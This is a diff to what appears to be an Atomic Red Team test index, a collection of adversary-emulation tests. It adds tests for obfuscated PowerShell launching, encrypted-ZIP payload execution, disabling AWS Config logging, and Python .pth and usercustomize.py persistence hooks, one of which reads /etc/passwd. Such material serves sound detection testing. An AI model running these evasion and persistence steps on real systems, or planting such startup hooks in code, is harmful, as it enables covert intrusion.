          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
-
          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
-
          #Write the decrypted eicar string to a file
          $decryptedString | out-file T1027.013_decryptedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
        name: powershell
        elevation_required: false
+    - name: Password-Protected ZIP Payload Extraction and Execution
+      auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
+      description: |
+        Extracts and executes a script from a password-protected ZIP archive.
+        This technique is commonly used by malware families like Emotet and QBot to deliver payloads
+        via email attachments where the password is provided in the message body.
+        The encrypted ZIP evades static file analysis until extracted at runtime.
+        Upon successful execution, displays confirmation and system information.
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        zip_password:
+          description: Password used to protect the ZIP archive
+          type: String
+          default: infected
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'zip and unzip must be installed
+
+          '
+        prereq_command: 'which zip && which unzip
+
+          '
+        get_prereq_command: 'echo "Install zip and unzip using your package manager
+          (apt-get, yum, or brew)"
+
+          '
+      executor:
+        command: |
+          echo '#!/bin/bash' > /tmp/art_payload.sh
+          echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
+          echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
+          echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
+          echo 'uname -a' >> /tmp/art_payload.sh
+          cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
+          rm /tmp/art_payload.sh
+          echo "Encrypted ZIP created. Extracting with password..."
+          unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
+          echo "Executing extracted payload:"
+          bash /tmp/art_payload.sh
+        cleanup_command: |
+          rm -f /tmp/art_payload.sh
+          rm -f /tmp/art_encrypted.zip
+        name: bash
  T1014:
    technique:
      type: attack-pattern
@@ -23857,6 +23899,22 @@ defense-evasion:

          '
        name: command_prompt
+    - name: Obfuscated PowerShell Command via Character Array
+      auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
+      description: "Spawns a child PowerShell process using character array obfuscation.
+        \nBoth the PowerShell binary name and executed command are constructed \nfrom
+        ASCII values at runtime to evade string-based detection.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $ps = [char[]](112,111,119,101,114,115,104,101,108,108)
+          $cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
+          & (-join $ps) "-Command" (-join $cmd)
+        cleanup_command: |
+          taskkill /f /im calculator.exe >nul 2>nul
+          taskkill /f /im CalculatorApp.exe >nul 2>nul
+        name: powershell
  T1556.006:
    technique:
      type: attack-pattern
@@ -27124,6 +27182,61 @@ defense-evasion:
        get_prereq_command: 'gcloud auth login --no-launch-browser

          '
+    - name: AWS - Config Logs Disabled
+      auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
+      description: 'Disables AWS Config by stopping the configuration recorder, deleting
+        the delivery channel, and deleting the configuration recorder. An attacker
+        with sufficient permissions can use this to stop configuration change recording
+        and avoid detection of subsequent activity.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        configuration_recorder_name:
+          description: Name of the configuration recorder
+          type: string
+          default: redatomictestconfigurationrecorder
+        delivery_channel_name:
+          description: Name of the delivery channel
+          type: string
+          default: redatomictestdeliverychannel
+        region:
+          description: Name of the region
+          type: string
+          default: us-west-2
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          default profile using: aws configure
+
+          '
+      - description: 'Check if terraform is installed.
+
+          '
+        prereq_command: 'terraform version
+
+          '
+        get_prereq_command: 'echo Please install terraform and configure your AWS
+          default profile
+
+          '
+      executor:
+        command: |
+          aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
+          echo "*** Configuration recorder stopped ***"
+          aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
+          echo "*** Delivery channel deleted ***"
+          aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
+          echo "*** Configuration recorder deleted ***"
+        cleanup_command: aws configservice list-configuration-recorders --region us-west-2
+        name: sh
+        elevation_required: false
  T1564.003:
    technique:
      type: attack-pattern
@@ -46275,7 +46388,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -46311,7 +46424,239 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test.
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
+          $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
+      description: 'Creates a Python startup hook using a .pth file inside a virtual
+        environment on macOS.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        exe_name:
+          description: App to launch
+          type: string
+          default: Calculator
+        python_exe:
+          description: The python binary name to test
+          type: string
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
+          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
+          $PYTHON_EXE -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          pkill "#{exe_name}" || true
+          [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
  T1037.003:
    technique:
      type: attack-pattern
@@ -60810,20 +61155,6 @@ persistence:

          3. Click 'Select'
        name: manual
-    - name: Chrome/Chromium (Chrome Web Store)
-      auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
-      description: Install the "Minimum Viable Malicious Extension" Chrome extension
-      supported_platforms:
-      - linux
-      - windows
-      - macos
-      executor:
-        steps: |
-          1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
-          in Chrome
-
-          2. Click 'Add to Chrome'
-        name: manual
    - name: Firefox
      auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
      description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -71751,7 +72082,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -71787,7 +72118,239 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test.
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
+          $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
+        cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
+          SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
+          -ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
+          }; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
+          (-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
+          | Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
+          missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
+          T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
+          |\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
+          \nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
+          -Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
+          -Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
+      description: 'Creates a Python startup hook using a .pth file inside a virtual
+        environment on macOS.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        exe_name:
+          description: App to launch
+          type: string
+          default: Calculator
+        python_exe:
+          description: The python binary name to test
+          type: string
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
+          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
+          $PYTHON_EXE -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          pkill "#{exe_name}" || true
+          [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
